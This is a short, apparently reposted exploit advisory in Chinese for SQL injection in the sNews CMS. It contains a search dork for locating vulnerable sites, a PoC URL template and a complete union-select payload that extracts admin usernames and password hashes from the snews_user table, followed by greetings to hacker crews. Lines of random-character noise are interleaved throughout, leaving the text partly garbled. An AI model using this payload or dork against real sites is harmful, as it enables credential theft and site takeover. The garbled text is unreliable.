标题: CMS snews SQL Injection Vulnerability9 `* _5 d5 S' r/ H
作者: By onestree4 D0 [" H" d1 f c) a
下载地址 : http://snewscms.com/
5 W" V; j {2 t, n- W# V测试平台 : ubuntu 12.10 / win 7
0 K Y" l% Y' Y( b* Z N% U关键词: inurl:"tanyakan pada rumput yang bergoyang"
1 |1 G# j4 @# E3 f) C. x+ @ + A! t8 Q' ?2 z
" _( U6 q4 c" O' d
*************************************************************: K3 m4 a2 P0 X9 y4 j
J- A/ N* ^* O1 ZSQL poc:
4 c$ m1 Q/ j1 o+ B: _6 g* Y2 R + h( ^" ]* A2 w7 r
http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]* ~' C- `+ X# p1 E2 Y) W, e
2 F2 U4 k, A( ~1 `' f
示例4 n- N5 E- i6 t
2 c: _' I& l- q7 \9 k% H1 ^3 `http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*
9 |% T. t3 c( Y& m : ^* k* D, I S4 W' a: z) |2 P! ~
' e5 ^& G' t# b ]致谢:0 L; q6 z+ c) q C! ?0 \
/ _: o7 ?+ m, \; q Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
& ]4 D2 @9 A& I- {
! s- I- U% b4 ~4 `9 c indonesiancoder - moeslimh4x0r - go-coder" C3 U! m B* G
h' T% ^ w5 I' [3 |5 Q& Gspesial my hunny :*) _* F( s/ G f5 _
|